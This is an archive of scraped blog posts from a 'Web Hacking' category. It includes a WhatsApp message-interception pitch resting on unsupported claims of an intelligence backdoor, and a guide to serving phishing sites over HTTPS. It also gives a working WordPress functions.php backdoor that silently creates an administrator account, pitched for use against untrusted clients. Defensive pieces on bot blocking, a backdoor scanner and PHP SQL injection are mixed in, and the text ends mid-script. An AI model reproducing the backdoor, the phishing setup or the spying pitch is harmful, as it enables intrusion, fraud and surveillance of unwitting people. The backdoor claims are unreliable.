Category Archives: (K) Web Hacking

Hack whatsapp messages without access to phone

WhatsApp Tracker allows Hackers to Intercept and Read Your Encrypted Messages

This method is perhaps the most appealing of them all. In essence, it uses a "backdoor" flaw.

Some say it is a severe mistake, while others claim it is an additional feature.

Either way, it allows you to hack WhatsApp and read messages by intercepting them between users. The same kind of behaviour is said to exist in Telegram and a few other apps.

First of all, we should explain end-to-end encryption. It means that you, as a user, send a message that is encrypted on your own device.

Only the recipient's device can decrypt it and make it readable. WhatsApp finished rolling this out to all of its users in April 2016, building on the Signal Protocol, and was then widely described as the most secure messenger of them all. Sadly, it is not quite as secure as that.

WhatsApp is owned by Facebook, and if we accept that this giant lets intelligence agencies spy on its users, we can deduce that WhatsApp shares the same flaw.

That is why, on this reading, the backdoor feature exists: originally developed for intelligence agencies, but at the same time something that hackers can use.

Furthermore, WhatsApp's end-to-end encryption works on "trust". Your client accepts whatever public key WhatsApp's server hands it for your contact, and according to the terms of service the company can change the rules at any moment.

Basically, WhatsApp can choose to share your messages with others and you won't know about it!

How does this actually work?

The vulnerability lies in the way WhatsApp behaves when a recipient's encryption key changes.

Consider two users, A and B.

When A sends a few messages to B, the WhatsApp client on B's device decrypts them and B can read them.

But if some of those messages are still undelivered when B replaces the device (or re-registers the phone number), B's new device will still receive and read them.

This is possible because WhatsApp's server can announce a new public key for B at any moment, and A's client will silently re-encrypt the undelivered messages to that new key and resend them, without asking A first.

Now, you as the attacker are user C. If you can make the server hand out your own public key as B's (in practice: by registering B's phone number on your own device, or by controlling the server), A's client will re-encrypt its pending messages to your key.

By doing so, you will be able to read the messages A intended for B. Note the limit of the trick: only messages that were still undelivered at the moment of the key change are re-sent; anything B already received is not exposed. A WhatsApp spy app that does this for you isn't so complicated to use, after all.

Here we have another advantage of this method. Facebook, which owns WhatsApp, has not changed this behaviour since it was reported to them in 2016 (it was made public in January 2017). It is obvious that it will stay available in the future as well.

All of this means that you, as a hacker, will be able to exploit this method in the near future. Combining it with an online WhatsApp tracker will give impressive results.

Some believe the backdoor is simply a usability feature that eliminates the need for constant key verification, which is annoying. Instead, WhatsApp does the verification for you.

But Signal Private Messenger, which uses the same protocol, is immune to this issue, simply because it refuses to send to a changed key until the user has verified it manually. WhatsApp only offers an optional "Show security notifications" setting, and that notification appears after the undelivered messages have already been re-sent.
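To make the two client policies concrete, here is a small simulation, added here and not code from the original page, WhatsApp or Signal: a store-and-forward server, and a sender whose client either re-encrypts its undelivered queue to a newly announced key (the WhatsApp behaviour described above) or holds the queue until the key is verified (the Signal behaviour). The cipher is a stand-in keystream rather than the Signal Protocol, and the keys, user names and messages are constructed.

```python
"""Key-change handling, simulated: the WhatsApp-style client silently
re-encrypts undelivered messages to whatever new key the server announces;
the Signal-style client holds them until the user verifies the key.

Added example; not code from the original page, WhatsApp or Signal.  The
cipher is a stand-in (SHA-256 keystream keyed by the recipient's public key)
so the script runs offline.  Only the client policy is the point."""
import hashlib
import itertools


def _keystream(pubkey, length):
    out = b""
    for counter in itertools.count():
        out += hashlib.sha256(pubkey + counter.to_bytes(4, "big")).digest()
        if len(out) >= length:
            return out[:length]


def encrypt_for(pubkey, plaintext):
    """Stand-in for 'encrypt this message to that identity key'."""
    return bytes(a ^ b for a, b in zip(plaintext, _keystream(pubkey, len(plaintext))))


def decrypt_with(pubkey, ciphertext):
    return encrypt_for(pubkey, ciphertext)  # XOR keystream: symmetric


class Server:
    """Key directory plus store-and-forward mailbox, as the messaging server holds it."""

    def __init__(self):
        self.keys = {}      # user -> identity public key currently registered
        self.mailbox = {}   # user -> ciphertexts waiting for the recipient

    def register(self, user, pubkey):
        # A (re)registration installs a new key; anything queued for the old
        # key is useless to the new device, so it is dropped.
        self.keys[user] = pubkey
        self.mailbox[user] = []

    def lookup(self, user):
        return self.keys[user]

    def deposit(self, user, ciphertext):
        self.mailbox[user].append(ciphertext)


class SenderClient:
    """Client of user A. policy is 'auto_resend' (WhatsApp) or 'block' (Signal)."""

    def __init__(self, server, policy):
        self.server = server
        self.policy = policy
        self.trusted = {}     # contact -> key pinned on first contact (trust on first use)
        self.pending = {}     # contact -> plaintexts sent but not yet acknowledged
        self.notices = []     # what the user would be shown

    def send(self, contact, plaintext):
        key = self.server.lookup(contact)
        self.trusted.setdefault(contact, key)
        self.server.deposit(contact, encrypt_for(key, plaintext))
        self.pending.setdefault(contact, []).append(plaintext)

    def acknowledged(self, contact):
        """Recipient confirmed delivery; nothing left to retransmit."""
        self.pending[contact] = []

    def on_key_change(self, contact):
        """Server says the contact's key changed. Returns how many messages were re-sent."""
        new_key = self.server.lookup(contact)
        if new_key == self.trusted[contact]:
            return 0
        self.notices.append("security code for %s changed" % contact)
        if self.policy == "block":
            return 0  # keep the queue until the user verifies the new key
        self.trusted[contact] = new_key  # accept the new key and re-encrypt the queue
        queued = self.pending.get(contact, [])
        for plaintext in queued:
            self.server.deposit(contact, encrypt_for(new_key, plaintext))
        return len(queued)


def run_scenario(policy):
    """A sends two messages to B; the second is still undelivered when C takes over B's number."""
    server = Server()
    b_key, c_key = b"identity-key-of-B", b"identity-key-of-C"  # constructed stand-in keys
    server.register("B", b_key)
    a = SenderClient(server, policy)
    a.send("B", b"meet at 9")
    a.acknowledged("B")               # delivered and read on B's real device
    a.send("B", b"bring the docs")    # B goes offline: stays queued at the server
    server.register("B", c_key)       # C registers B's number on C's own device
    resent = a.on_key_change("B")
    seen_by_c = [decrypt_with(c_key, ct) for ct in server.mailbox["B"]]
    return {"resent": resent, "read_by_C": seen_by_c, "notices": a.notices}


if __name__ == "__main__":
    for policy in ("auto_resend", "block"):
        print(policy, run_scenario(policy))
```

Under the auto_resend policy C ends up reading "bring the docs", the one message still queued when the key changed, while "meet at 9", already delivered, is never exposed under either policy; the block policy re-sends nothing and shows the same notice to the user before anything leaves the device.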

If you are a decent hacker, you will be able to exploit this method, or better said this weakness of WhatsApp.

After all, it was introduced to allow agencies to spy on users, which means that hackers, including yourself, can use it for the same purpose.



Take this a step further: HTTPS should be used on all your phishing sites, regardless of whether they harvest sensitive data. You have a much better chance of getting past any web proxy servers in place by running a fully encrypted stream.

Phishing Frenzy now supports using an SSL Certificate and hosting your websites over HTTPS. Since Phishing Frenzy is essentially a front end for the Apache web service, you can upload your SSL certificate, activate the campaign and watch it all come to life over HTTPS. Now that’s legit.

How it Works

Let's Encrypt has a nifty command line tool that we can run from our phishing server to quickly obtain a valid SSL certificate. The tool has since been renamed "certbot" and can be downloaded from GitHub here:

Once you’ve downloaded the script onto your server, it’s really a one-liner to get the SSL certificate in your possession.

The first thing to note is that Apache cannot be running while you run certbot in standalone mode. To validate that you own the domain, Let's Encrypt resolves the FQDN to the IP address of the server you are on; certbot then starts a small web server on port 80 that serves a token proving to Let's Encrypt that you control that domain name. (If the downtime is a problem, certbot's webroot plugin serves the same token from a directory under your running Apache instead.)

This means that any active phishing campaigns on the server would be disabled temporarily while you obtain the SSL certificate. Keep this in mind so that you are not disrupting an active campaign of yours or a colleague's.


If you try to invoke the certbot script with Apache running you’ll be notified with a nice little warning like below:

(Image: certbot warning that Apache is already running)

So once you’ve properly disabled your active web server, you can then run the “certbot” command similar to below. Make sure to tweak this for the domain name that you’re configuring.

./certbot-auto certonly --standalone -d <fqdn>

The --standalone flag tells certbot to run a small web server of its own, temporarily hosting the validation page, in order to authenticate with Let's Encrypt. The certonly subcommand tells certbot that you don't want it to configure Apache with the certificate automatically: just hand us the certificate, and we'll deploy it to Apache ourselves through the Phishing Frenzy web UI.

Once this has run successfully, you are the proud new owner of a valid SSL certificate; congratulations. By default the files are dropped under /etc/letsencrypt/live/:fqdn (cert.pem, chain.pem, fullchain.pem and privkey.pem), which are really symbolic links into the versioned /etc/letsencrypt/archive/:fqdn directory, as seen below:



Now we have all of the SSL files required to host our phishing site over HTTPS. Let's start Apache back up and jump back over to our campaign within Phishing Frenzy. All we need to do is upload the SSL certificate as seen below and save. Make sure to assign the cert, key and chain correctly using the dropdowns on the right.


Once this data has been uploaded and saved to the campaign properly, you can then activate the campaign and your phishing site is now live over HTTPS.  Anyone who tries to hit the phishing site over HTTP will be automatically redirected to HTTPS by default.



If you're not leveraging HTTPS for all your phishing engagements, you should be. Let's Encrypt is a great service and is changing the world of SSL certificate authorities. It costs you nothing, and its tools can auto-magically configure your Nginx or Apache web server with a couple of added flags.

In the future we may incorporate Let’s Encrypt into the Web UI itself so that it communicates with the Let’s Encrypt API to pull down the SSL certificate and apply it to the current campaign.

Hope you enjoyed, and enjoy phishing all the things over HTTPS.

How is backdoor created in WordPress ?

When the front door is closed, you might try the back door. This may sound like a malicious way of using code to get into a site without having access to it, but there are times when you need to regain control of your own site because somebody has taken it from you.

No matter how many times this thief deletes your information or restores a backup on a server he probably owns, there is a chance he knows nothing about backdoor entrances. If he did, he probably wouldn't have needed your help setting up WordPress, right?

Create a backdoor:

OK, enough with the talk; here's the piece of code you will need to get the job done:

  1. Open your theme's functions.php file
  2. Copy/paste the following code:

    add_action('wp_head', 'wploop_backdoor');
    function wploop_backdoor() {
        // runs on every front-end page; only acts when ?backdoor=hellomoto is present
        if (isset($_GET['backdoor']) && $_GET['backdoor'] == 'hellomoto') {
            if (!username_exists('name')) {
                $user_id = wp_create_user('name', 'pass');
                $user = new WP_User($user_id);
                $user->set_role('administrator');
            }
        }
    }

  3. Save changes

If you leave the code as it is, all you have to do to create a new admin on the site is visit any page of it with ?backdoor=hellomoto appended to the URL.

After the page has loaded, your new username is "name" and the password is "pass".

Of course, you can change that in the code above by changing ‘name’ and ‘pass’ to whatever you want. You can also change the link to your back door by changing ‘backdoor’ and/or ‘hellomoto’ to anything you come up with.

Try the function: not only is it fun, it can really help you some time in the future when you are about to build a site for someone you can't completely trust. Keep in mind that the trigger value travels in the URL, so it ends up in access logs and browser history, and that security scanners flag exactly this pattern as malware, which is also what to look for if you suspect one has been planted on a site of yours.
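The same pattern is what a defender looks for when a site has been taken over. The following scanner, added here and not code from the page or from WordPress, greps a WordPress tree for request-gated account creation combined with an administrator role grant or a front-end hook; the two sample PHP sources embedded in it (the snippet above and a benign registration handler) are constructed for the demonstration.

```python
"""Scan a WordPress tree for the kind of request-triggered admin creation the
functions.php snippet above performs.  Added example, not part of the page or
of WordPress; a defender's counterpart to the trick, and a heuristic only:
obfuscated variants (base64 + eval, variable function names) need other rules."""
import re
from pathlib import Path

SIGNATURES = {
    # a user account gets created ...
    "creates_user": re.compile(r"\bwp_(?:create|insert)_user\s*\("),
    # ... possibly promoted to administrator ...
    "grants_admin": re.compile(r"->\s*set_role\s*\(\s*['\"]administrator['\"]"),
    # ... under the control of something in the request ...
    "request_gated": re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["),
    # ... from a hook that fires on every front-end page load
    "front_end_hook": re.compile(
        r"add_action\s*\(\s*['\"](?:wp_head|init|wp_loaded|template_redirect)['\"]"),
}


def scan_source(src):
    """Which signatures match this PHP source."""
    return {name: bool(rx.search(src)) for name, rx in SIGNATURES.items()}


def is_backdoor_candidate(found):
    # A registration form also creates users from $_POST, so require either an
    # administrator role grant or a front-end hook in addition.
    return found["creates_user"] and found["request_gated"] and (
        found["grants_admin"] or found["front_end_hook"])


def scan_tree(root):
    """Return [(path, [matched signature names])] for suspicious PHP files under root."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        found = scan_source(path.read_text(errors="replace"))
        if is_backdoor_candidate(found):
            hits.append((str(path), [k for k, v in found.items() if v]))
    return hits


# Constructed samples: the snippet from above, and a benign registration handler.
BACKDOOR_SAMPLE = """<?php
add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
    if (isset($_GET['backdoor']) && $_GET['backdoor'] == 'hellomoto') {
        if (!username_exists('name')) {
            $user_id = wp_create_user('name', 'pass');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
"""

BENIGN_SAMPLE = """<?php
add_action('admin_post_nopriv_signup', 'theme_handle_signup');
function theme_handle_signup() {
    check_admin_referer('theme_signup');
    $user_id = wp_create_user(sanitize_user($_POST['login']), wp_generate_password());
    $user = new WP_User($user_id);
    $user->set_role('subscriber');
}
"""

if __name__ == "__main__":
    import sys
    for path, why in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(path, ", ".join(why))
```

Point it at wp-content and review every hit by hand: the signatures are deliberately loose, and a theme that legitimately creates users from a front-end form will also show up, which is fine for a triage tool.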




Alternatives to Tor Browser for Anonymous Browsing

Here are the best anonymous browsing tools that are better than the Tor Browser. Pick any from the list, download it and use it for private browsing on your computer.

Best Alternatives to Tor Browser for Anonymous Browsing

1. I2P

I2P is an anonymous peer-to-peer distributed communication layer built with open source tools; the software implementing this network layer is the I2P router. It is designed for anonymous services inside the network, is claimed to be faster than Tor, and is a full alternative to Tor. It is self-organising and distributed by design.

2. Freenet

Freenet is a peer-to-peer platform for censorship-resistant communication, similar to I2P. It uses similar P2P techniques (distributed data storage) to distribute and keep information, but differs in its user interface and network structure. It offers two modes of operation, Darknet (connecting only to trusted friends) and Opennet.

3. Freepto

Freepto is a Linux-based operating system booted from a USB stick on any PC. It is easy to run, and the data you save to the stick is stored encrypted. It offers hacktivists a straightforward way to communicate, much as Tor does.

4. JonDo Live-CD

JonDo Live-CD is a Linux-based OS that comes with pre-configured applications for web surfing. It includes Thunderbird, Tor Browser and many other programs.

5. Tox

Tox is not a complete stand-in for Tor, but it provides messaging services: private, encrypted IM, video conferencing and calls in a user-friendly client.

6. Lightweight Portable Security (LPS)

Lightweight Portable Security creates a secure end node from trusted media on almost any Intel-based PC. It boots a Linux operating system from CD; administrator privileges are not required and nothing is installed on the host.

7. IprediaOS

IprediaOS is a fast, powerful and stable Linux-based operating system that provides an anonymous environment. All traffic is encrypted and anonymised. Many applications are available in IprediaOS, for mail, peer-to-peer and BitTorrent among others.

How to Prevent Hackers from Using Bad Bots To Exploit Your Website


(Image created by the author)

The Bot Bandits Are Out of Control

I’ve always known that bots crawl my websites and the sites of all my fellow developers, but I was unaware that bots now make more visits than people do to most websites. Yep, they officially overtook us in 2012, and bots now dominate website visits. Egad, it’s Star Wars run amok!

Before we become alarmed, though, let’s look at a few facts that demonstrate the preponderance of bots in our midst.

The bots are coming. The bots are coming. The bots are here!

(Image source)

Incapsula’s 2013 bot traffic report states that “Bot visits are up 21% to represent 61.5% of all website traffic.” If bots are preponderant, what does that mean for us?

For those of you just tuning in, preponderance means “the quality or fact of being greater in number, quantity, or importance.” That means the bots are “more important than humans” in determining the value of websites to potential readers.

A quick look at antonyms for preponderance reveals that our plight is worse than expected. Antonyms for preponderance include disadvantage, inferiority, subordination, subservience, surrender and weakness.

All is not lost, however. Not all bots are bad. In fact, in the wild and woolly world of SEO, Googlebots are actually our friends. A “Googlebot” is Google’s web crawling bot, also known as a “spider,” that crawls the Internet in search of new pages and websites to add to Google’s index.

Googlebots: Our Ally in the Bot Wars

If we think of the web as an ever-growing library with no central filing system, we can understand exactly what a Googlebot wants. A Googlebot's mission is to crawl this library and create a filing system. Bots need to be able to quickly and easily crawl sites. When a Googlebot arrives at your site, its first point of access is your site's robots.txt file, which highlights the importance of making that file easy for the bots to read. The less time Googlebots spend on irrelevant portions of your site, the better. At the same time, be sure you have not inadvertently siloed or blocked pages of your site that should not be blocked.


(Image source)

Next, Googlebots use the sitemap.xml file to discover all areas of your site. The first rule of thumb is this: keep it simple. Googlebots do not crawl DHTML, Flash, Ajax nor JavaScript as well as they crawl HTML. Since Google has been less than forthcoming about how its bots crawl JavaScript and Ajax, avoid using this code for your site’s most important elements. Next, use internal linking to create a smart, logical structure that will help the bots efficiently crawl your site. To check the integrity of your internal linking structure, go to Google Webmaster Tools -> Search Traffic -> Internal Links. The top-linked pages should be your site’s most important pages. If they aren’t, you need to rethink your linking structure.

So, how do you know if the Googlebots are happy? You can analyze Googlebot’s performance on your site by checking for crawl errors. Simply go to Webmaster Tools -> Crawl and check the diagnostic report for potential site errors, URL errors, crawl stats, site maps and blocked URLs.

The Enemy in our Midst: Bandit Bots

Googlebots aren’t the only bots visiting your site. In fact, over 38% of the bots crawling our sites are out for no good. So not only are we out-numbered, but nearly 2 out of every 5 visitors to your site are trying to steal information, exploit security loopholes and pretend to be something they are not.

We’ll call these evil bots “bandit bots”.

So, what are we to do?

As an SEO provider and website developer, I could protest. I could blog my little heart out and get a few friends to join me. Or I could buckle down and take responsibility for my own little corner of the web and fight back against the bandit bots.

Let’s do this together.

Bandit Bots: What They Are and How to Fight Back

The bad guys come in four flavors. Learn which bots to watch out for and how to fight back.


Scrapers

These bandit bots steal and duplicate content, as well as email addresses. Scraper bots normally focus on retrieving data from a specific website, and they also try to collect personal information from directories or message boards. While scraper bots target a variety of verticals, common targets include online directories, airlines, e-commerce sites and property sites. Scrapers will also use your content to divert web traffic, and multiple pieces of scraped content can be scrambled together into "new" content that avoids duplicate-content penalties.

What’s at risk: Scrapers grab your RSS feed so they know when you publish content. However, if you don’t know that your site is being attacked by scrapers, you may not realize there’s a problem. In the eyes of Google, however, ignorance is no excuse. Your website could be hit by severe penalties for duplicate content and even fail to appear in search engine rankings.

How to fight back: Be proactive and attentive to your site, thus increasing the likelihood that you can take action before severe damage is done.

There are two good ways to identify if your site is the victim of a scraper attack. One option is to use a duplicate-content detection service like Copyscape to see if any duplicate content comes up.


(Image created by the author)

A second option for alerting you that content might have been stolen from your site is to use trackbacks within your own content. In general, it’s good SEO to include one or two internal site links within your written content. When you include these links, be sure to activate WordPress’s trackback feature. In the trackback field on your blog’s entry page, simply enter the URL of the article you are referencing. (In this case, it will be one on your own websites, not another site).



(Image created by the author)

You can manually look at your trackbacks to see what sites are using your links. If you find that your content has been re-posted without your permission on a spam site, file a DMCA-complaint with Google.

Finally, if you know the IP address from which scraper bots are operating, you can block them from your feed directly. Add the following code to your .htaccess file. Learn how to edit your .htaccess file first. (See editing your .htaccess file on WordPress.)

RewriteEngine on
RewriteCond %{REMOTE_ADDR} ^<scraper IP>$
RewriteRule ^(.*)$ <replacement content URL>

In this example, <scraper IP> is the address you want to redirect (escape the dots, e.g. ^203\.0\.113\.9$, so that 203.0.113.9 does not also match 203x0x113x9) and <replacement content URL> is the custom content you want to send them instead of your feed.

Warning! Be very careful editing this file. It could break your site if done incorrectly. If you are unsure of how to edit this file, ask for help from a web developer.

Hacking Tools

Hacking bandit bots target credit cards and other personal information by injecting or distributing malware to hijack a site or server. Hacker bots also try to deface sites and delete critical content.

What’s at risk: It goes without saying that should your site be the victim of a hacking bot, your customers could lose serious confidence in the security of your site for e-commerce transactions.

How to fight back: Most of the attacked sites are victims of "drive-by hackings", site hackings done randomly and with little regard for the impacted business. To prevent your site from becoming a hacking victim, make a few basic modifications to your .htaccess file, which is typically found in the public_html directory. This is a great starter list of common hacking bots. Copy and paste this list into the .htaccess file to block any of these bots from accessing your site. You can add bots, remove bots and otherwise modify the list as necessary. Bear in mind that such lists match on the User-Agent string, which any bot can change, so treat them as a first filter rather than a guarantee.
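User-Agent blocklists stop only the bots that announce themselves. The script below, added here and not part of the original post, reads Apache combined-format log lines, verifies any visitor claiming to be Googlebot the way Google documents it (reverse DNS into googlebot.com or google.com, then a forward lookup that maps back to the same address), flags credential-probing bots, and emits block rules in the RewriteCond/RewriteRule style used in the scraper section. The log lines, IP addresses and DNS answers are constructed; in production, replace fake_reverse and fake_forward with socket.gethostbyaddr and socket.gethostbyname_ex.

```python
"""Pick likely bandit bots out of an Apache access log: fake Googlebots
(User-Agent says Googlebot, reverse DNS does not), credential-probing bots
and heavy hitters, then emit block rules in the .htaccess style used above.
Added example, not code from the original post; log lines, IPs and DNS
answers are constructed."""
import re
from collections import Counter, defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

GOOGLE_SUFFIXES = (".googlebot.com", ".google.com")
PROBE_PATHS = ("/wp-login.php", "/xmlrpc.php")


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def verify_googlebot(ip, reverse_dns, forward_dns):
    """Google's published check: PTR in a Google domain and the A record maps back."""
    host = reverse_dns(ip)
    if not host or not host.endswith(GOOGLE_SUFFIXES):
        return False
    return ip in forward_dns(host)


def analyse(lines, reverse_dns, forward_dns, probe_limit=2, hit_limit=50):
    hits = Counter()
    probes = Counter()
    claims = defaultdict(set)   # ip -> User-Agents claiming to be Googlebot
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        hits[rec["ip"]] += 1
        if rec["method"] == "POST" and rec["path"] in PROBE_PATHS:
            probes[rec["ip"]] += 1
        if "googlebot" in rec["ua"].lower():
            claims[rec["ip"]].add(rec["ua"])
    verified = sorted(ip for ip in claims if verify_googlebot(ip, reverse_dns, forward_dns))
    fakes = sorted(ip for ip in claims if ip not in verified)
    probing = sorted(ip for ip, n in probes.items() if n >= probe_limit)
    heavy = sorted(ip for ip, n in hits.items() if n >= hit_limit and ip not in verified)
    return {"verified_googlebot": verified, "fake_googlebot": fakes,
            "probing": probing, "heavy": heavy}


def htaccess_rules(ips):
    """Block rules in the RewriteCond/RewriteRule form shown earlier (403 instead of a redirect)."""
    ips = sorted(set(ips))
    if not ips:
        return ""
    conds = ["RewriteCond %%{REMOTE_ADDR} ^%s$ [OR]" % re.escape(ip) for ip in ips]
    conds[-1] = conds[-1][:-len(" [OR]")]   # the last condition must not carry [OR]
    return "\n".join(["RewriteEngine on"] + conds + ["RewriteRule ^(.*)$ - [F,L]"])


# Constructed sample log (combined format) and DNS answers.
SAMPLE_LOG = """\
66.249.66.1 - - [10/Mar/2016:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.9 - - [10/Mar/2016:10:00:02 +0000] "GET /feed/ HTTP/1.1" 200 8000 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.9 - - [10/Mar/2016:10:00:03 +0000] "GET /2016/03/post-1/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.7 - - [10/Mar/2016:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 3000 "-" "python-requests/2.9.1"
198.51.100.7 - - [10/Mar/2016:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3000 "-" "python-requests/2.9.1"
198.51.100.7 - - [10/Mar/2016:10:00:06 +0000] "POST /xmlrpc.php HTTP/1.1" 200 400 "-" "python-requests/2.9.1"
192.0.2.5 - - [10/Mar/2016:10:00:07 +0000] "GET /about/ HTTP/1.1" 200 5000 "https://example.org/" "Mozilla/5.0 (Windows NT 10.0) Firefox/44.0"
""".splitlines()

PTR = {"66.249.66.1": "crawl-66-249-66-1.googlebot.com", "203.0.113.9": "vps9.example.net"}
A_RECORDS = {"crawl-66-249-66-1.googlebot.com": ["66.249.66.1"], "vps9.example.net": ["203.0.113.9"]}


def fake_reverse(ip):          # stands in for socket.gethostbyaddr(ip)[0]
    return PTR.get(ip)


def fake_forward(host):        # stands in for socket.gethostbyname_ex(host)[2]
    return A_RECORDS.get(host, [])


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG, fake_reverse, fake_forward)
    print(report)
    print(htaccess_rules(report["fake_googlebot"] + report["probing"]))
```

On the sample, 203.0.113.9 claims to be Googlebot but resolves to an unrelated host and is listed as a fake, 198.51.100.7 is flagged for hammering wp-login.php and xmlrpc.php, and the real crawler at 66.249.66.1 is left alone.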


Spam Bots

Spam bots load sites with garbage to discourage legitimate visits, turn targeted sites into link farms and bait unsuspecting visitors with malware/phishing links. Spam bots also take part in high-volume spamming in order to get a website blacklisted in search results and destroy your brand's online reputation.

What’s at risk: Failure to protect your site from spammers can cause your website to be blacklisted, destroying all your hard work at building a credible online presence.

How to fight back: Real-time malicious traffic detection is critical to your site’s security, but most of us don’t have the time to simply sit around and monitor our site’s traffic patterns. The key is to automate this process.

If you're using WordPress, one of the first steps in fighting back against spam bots is to stop spam in the first place. Start by installing Akismet; it is on all my personal sites as well as the sites I manage for my clients. Next, install a trusted security plugin and set up automatic backups of your database.


(Image created by the author)

Require legitimate registration with CAPTCHAs for all visitors who want to post comments or replies. Finally, keep up with what's new in the world of security.

Click Frauders

Click fraud bots make PPC ads meaningless by “clicking” on the ads so many times you effectively spend your entire advertising budget, but receive no real clicks from interested customers. Not only do these attacks drain your ad budget, they also hurt your ad relevance score for whatever program you may be using. Google AdWords and Facebook ads are the most frequent targets of these attacks.

What’s at risk: Click fraud bots waste your ad budget with meaningless clicks and prevent interested customers from actually clicking on your ad. Worse, your Ad Relevance score will plummet, destroying your credibility and making it difficult to compete for quality customers in the future.

How to fight back: If your WordPress site is being targeted by click fraud bots, immediately download and install the Google AdSense Click Fraud monitoring plugin. The plugin counts all clicks on your ads. Should the clicks exceed a specified number, the IP address for the clicking bot (or human user) is blocked. The plugin also blocks a list of specific IP addresses. The plugin is specifically for the Adsense customers to install on their websites; AdWords customers have no capabilities to implement this plugin.


(Image created by the author)

When defending a website from hacker bots, it takes a concentrated effort to thwart their attacks. While the above steps are important and useful, there are some attacks, like coordinated DDoS, that you simply cannot fight off on your own. Fortunately, a number of tech security companies specialize in anti-DDoS tools and services. If you suspect your site (or one of your client’s sites) is being targeted for DDoS, such companies can be key to a successful defense.

I recommend keeping up with what's new in the world of security.


Giving honest Googlebots what they want is quite simple. Develop strong, relevant content and publish regularly. Combatting the fake Googlebots and other bot bandits is a bit tougher. Like many things in life, it requires diligence and hard work.

Meet Apache Spot, a new open source project for cybersecurity

The effort taps big data analytics and machine learning for advanced threat detection

The Apache Spot project was announced at Strata+Hadoop World on Wednesday, Sept. 28, 2016.

Credit: Katherine Noyes

Hard on the heels of the discovery of the largest known data breach in history, Cloudera and Intel on Wednesday announced that they’ve donated a new open source project to the Apache Software Foundation with a focus on using big data analytics and machine learning for cybersecurity.

Originally created by Intel and launched as the Open Network Insight (ONI) project in February, the effort is now called Apache Spot and has been accepted into the ASF Incubator.

“The idea is, let’s create a common data model that any application developer can take advantage of to bring new analytic capabilities to bear on cybersecurity problems,” Mike Olson, Cloudera co-founder and chief strategy officer, told an audience at the Strata+Hadoop World show in New York. “This is a big deal, and could have a huge impact around the world.”

Based on Cloudera’s big data platform, Spot taps Apache Hadoop for infinite log management and data storage scale along with Apache Spark for machine learning and near real-time anomaly detection. The software can analyze billions of events in order to detect unknown and insider threats and provide new network visibility.

Essentially, it uses machine learning as a filter to separate bad traffic from benign and to characterize network traffic behavior. It also uses a process including context enrichment, noise filtering, whitelisting and heuristics to produce a shortlist of most likely security threats.

By providing common open data models for network, endpoint, and user, meanwhile, Spot makes it easier to integrate cross-application data for better enterprise visibility and new analytic functionality. Those open data models also make it easier for organizations to share analytics as new threats are discovered.

Other contributors to the project so far include eBay, Webroot, Jask, Cybraics, Cloudwick, and Endgame.

“The open source community is the perfect environment for Apache Spot to take a collective, peer-driven approach to fighting cybercrime,” said Ron Kasabian, vice president and general manager for Intel’s Analytics and Artificial Intelligence Solutions Group. “The combined expertise of contributors will help further Apache Spot’s open data model vision and provide the grounds for collaboration on the world’s toughest and constantly evolving challenges in cybersecurity analytics.”

Top 6 security attacks in PHP

Being aware of the most common security threats to PHP applications is an important step towards securing your PHP scripts, though it does not make them immune. This article goes over the six most common security threats to PHP scripts. You may already be familiar with them; if not, this is a good time to read about them and keep them in mind.

1. SQL injection

SQL injection is an attack in which a malicious user enters SQL into form fields in a way that changes the SQL statements your application executes. A variation is command injection, where user data is passed to system() or exec(); it shares the same mechanism as SQL injection but targets shell commands.

    $username = $_POST['username'];   // untrusted input, used without escaping
    $query = "select * from auth where username = '".$username."'";
    echo $query;
    $db = new mysqli('localhost', 'demo', 'demo', 'demodemo');
    $result = $db->query($query);
    if ($result && $result->num_rows) {
        echo "<br />Logged in successfully";
    } else {
        echo "<br />Login failed";
    }

In the code above, the user-supplied value ($_POST['username']) is taken on the first line without any filtering or escaping, and on the second line it is pasted straight into the SQL text. A username such as ' OR '1'='1 turns the WHERE clause into one that matches every row, so the script reports a successful login; other inputs can make the query fail or, given enough privileges, damage the database.

Preventing SQL injection


  • Escape data with mysqli_real_escape_string() (mysql_real_escape_string() belongs to the old mysql extension, removed in PHP 7), and only for values that sit inside quotes
  • Manually check that each piece of data is of the right type (e.g. cast IDs to int)
  • Use prepared statements and bind variables

Use prepared statements

  • They separate data from SQL logic
  • The driver handles the quoting for you, so nothing in the data can alter the statement
  • Adopting them as a coding standard limits the damage new developers in your organisation can do
    $query = 'select name, district from city where countrycode=?';
    if ($stmt = $db->prepare($query)) {
        $countrycode = 'hk';
        $stmt->bind_param("s", $countrycode);   // bound as a string, never part of the SQL text
        $stmt->execute();
        $stmt->bind_result($name, $district);
        while ($stmt->fetch()) {
            echo $name.', '.$district;
            echo '<br />';
        }
        $stmt->close();
    }
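To see the difference between the three mitigations, here is the login query from the first snippet rebuilt in Python against an in-memory SQLite database (added example; not code from the page, and the table rows are constructed). It runs the same tautology payload through string concatenation, through quote-escaping as mysqli_real_escape_string() would do it, and through a bound parameter, and adds a numeric-context query to show where escaping stops working.

```python
"""The login query from the PHP snippet above, reproduced against SQLite so it
can be run offline, with three ways of building it: string concatenation (the
vulnerable original), quote-escaping (what mysqli_real_escape_string does),
and a bound parameter.  Added example, not code from the page; the table and
rows are constructed.  SQLite escapes a quote as '' where MySQL uses \\', but
the behaviour of each approach is the same."""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE auth (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
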